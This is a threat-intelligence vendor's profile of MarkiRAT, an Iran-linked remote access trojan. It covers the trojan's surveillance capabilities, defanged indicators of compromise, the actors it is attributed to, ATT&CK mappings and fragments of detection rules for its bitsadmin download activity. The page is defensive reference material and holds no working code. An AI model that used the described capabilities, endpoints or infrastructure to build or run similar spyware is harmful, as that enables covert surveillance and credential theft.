Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
MalwareUsed by 2 actorsExploits 1 CVE

MarkiRAT

MarkiRAT is a custom remote access trojan/backdoor associated with the Iran-linked TAG-182 activity cluster and also reported in connection with the Iran-linked Ferocious Kitten threat group. The malware has been used in cyber-surveillance operations and provides broad collection and remote access capabilities. Reported functionality includes retrieving the victim username, capturing all keystrokes, capturing clipboard contents, taking screenshots saved initially as "scr.jpg", searching the filesystem for targeted file types and credential stores, gathering information from the KeePass password manager, checking for the Telegram installation directory by enumerating files on disk, checking running processes for Kaspersky and Bitdefender antivirus products, and using the GetKeyboardLayout API to determine whether the compromised host keyboard is set to Persian. MarkiRAT can execute arbitrary or remote commands, store collected data locally in a created .nfo file, and exfiltrate staged data over its C2 channel, including staged exfiltration over HTTP(S). The malware has masqueraded as update.exe and svehost.exe, and has also mimicked legitimate Telegram and Chrome files; one listed path is C:\Users\Public\AppData\Windows\svehost.exe. Supporting detection content also references BITSAdmin-based payload download activity tied to MarkiRAT, including use of /i.php?u= and /uploadx.php endpoints, and notes that it has been delivered under filenames such as YEPlayer.dll, YEMPlayer.zip, YEMPlayer.msi, Pis2rayVPN.msi, Pis2rayVPN.zip, and Pis2rayN.dll. Observed infrastructure and indicators mentioned in the content include domains yeplayer[.]store, yemplayer[.]site, pis2ray[.]online, microsoft[.]comi-site[.]website, microsotf[.]comi-site[.]website; IPs 45[.]86[.]162[.]197, 46[.]30[.]191[.]105, 46[.]30[.]191[.]123, 89[.]144[.]145[.]237, 89[.]144[.]145[.]239, and 212[.]83[.]61[.]198; and sample SHA-256 hashes 13440348516ccee839675f6ac908dd1724ce1d28f92af92fdc7938740d2b7ec5, bb0c7ae4f12e5141480ee26f473636b07e836bb994ff3b2cfec93d4480da171b, and fa246327bed8fc5864827a8147b8b7aedb6246068259b8c97e82adb957315347.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES
CVE-2021-40444Microsoft MSHTML Remote Code Execution Vulnerability

Over multiple years, the group developed and deployed a custom implant known as MarkiRAT that provides broad collection capabilities, keystroke and clipboard logging, screenshots, filesystem searches for targeted file types and credential stores, remote command execution, and staged exfiltration over HTTP(S).

via picus security blogpicussecurity.com
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
TAG-182

TAG-182’s malware scheme is likely one of the myriad tactics, techniques, and procedures (TTPs) used by these organizations... rule APT_IR_TAG182_MarkiRAT_2 ... description = "Track the main backdoor of TAG-182, MarkiRAT" ... title: MarkiRAT Malware Bitsadmin File Download ... description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182.

via recorded future blogrecordedfuture.com
Ferocious Kitten

Over multiple years, the group developed and deployed a custom implant known as MarkiRAT that provides broad collection capabilities, keystroke and clipboard logging, screenshots, filesystem searches for targeted file types and credential stores, remote command execution, and staged exfiltration over HTTP(S).

via picus security blogpicussecurity.com
MITRE ATT&CK

Techniques & procedures

22 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

3 techniques
T1059.003Windows Command ShellEvidence3

tags: - attack.t1197 # BITS Jobs - attack.t1059.003 # Command and Scripting Interpreter: Windows Command Shell

T1106Native APIEvidence1

"ADVSTORESHELL is capable of starting a process using CreateProcess"; "build_downer has the ability to use the WinExec API"; "Aria-body has the ability to launch files using ShellExecute"

T1197BITS JobsEvidence3

title: MarkiRAT Malware Bitsadmin File Download ... description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182. ... tags: - attack.t1197 # BITS Jobs

Persistence

3 techniques
T1197BITS JobsEvidence3

title: MarkiRAT Malware Bitsadmin File Download ... description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182. ... tags: - attack.t1197 # BITS Jobs

T1547.001Registry Run Keys / Startup FolderEvidence4

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders.

T1547.009Shortcut ModificationEvidence1

Privilege Escalation

2 techniques
T1547.001Registry Run Keys / Startup FolderEvidence4

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders.

T1547.009Shortcut ModificationEvidence1

Stealth

3 techniques
T1036MasqueradingEvidence2

During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.

T1036.005Match Legitimate Resource Name or LocationEvidence1

Akira has used legitimate names and locations for files to evade defenses.

T1197BITS JobsEvidence3

title: MarkiRAT Malware Bitsadmin File Download ... description: Detects the use of bitsadmin to download a file from a remote URL by MarkiRAT malware used by Iran-Nexus TAG-182. ... tags: - attack.t1197 # BITS Jobs

Credential Access

3 techniques
T1056.001KeyloggingEvidence1
T1555Credentials from Password StoresEvidence1

Fox Kitten has used scripts to access credential information from the KeePass database. Indrik Spider has accessed and exported passwords from password managers. Proton gathers credentials in files for 1password. TrickBot can steal passwords from the KeePass open source password manager.

T1555.005Password ManagersEvidence1

LAPSUS$ has accessed local password managers and databases to obtain further credentials from a compromised network. Scattered Spider has searched for credentials in password vaults and Privileged Access Management (PAM) solutions including HashiCorp Vault. Storm-0501 has stolen credentials contained in the password manager Keepass by utilizing Find-KeePassConfig.ps1.

Discovery

6 techniques
T1033System Owner/User DiscoveryEvidence4

The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.

T1057Process DiscoveryEvidence2

The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.

T1082System Information DiscoveryEvidence4

The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."

T1083File and Directory DiscoveryEvidence4

The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").

T1518Software DiscoveryEvidence2

"Bazar can query the Registry for installed applications." / "BRONZE BUTLER has used tools to enumerate software installed on an infected host." / "LightSpy ... enumerate the Applications folder to collect the bundle name, bundle identifier, and version information..." / "Volt Typhoon has queried the Registry on compromised systems for information on installed software."

T1614.001System Language DiscoveryEvidence2

Avaddon checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States (CIS) entities... Bazar can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian... Clop has checked the keyboard language using the GetKeyboardLayout() function... Ryuk has been observed to query the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language and the value InstallLanguage.

Collection

5 techniques
T1005Data from Local SystemEvidence1
T1056.001KeyloggingEvidence1
T1074Data StagedEvidence1

The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.

T1113Screen CaptureEvidence1

"Agent Tesla can capture screenshots of the victim’s desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop"

T1115Clipboard DataEvidence3

Agent Tesla can steal data from the victim’s clipboard. APT38 used a Trojan called KEYLIME to collect data from the clipboard. APT39 has used tools capable of stealing contents of the clipboard.

Command and Control

1 technique
T1071.001Web ProtocolsEvidence3

The content repeatedly describes threat actors and malware using HTTP and HTTPS for command and control, such as: "Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests."

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence5

Many entries state malware or actors can upload, transfer, send, or exfiltrate files from compromised hosts to command-and-control servers or attacker infrastructure.

INDICATORS OF COMPROMISE

IOCs tracked for this family

56 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
40 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
15 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
1 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
ACTIVITY FEED

Recent activity

27 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching56

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping22

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.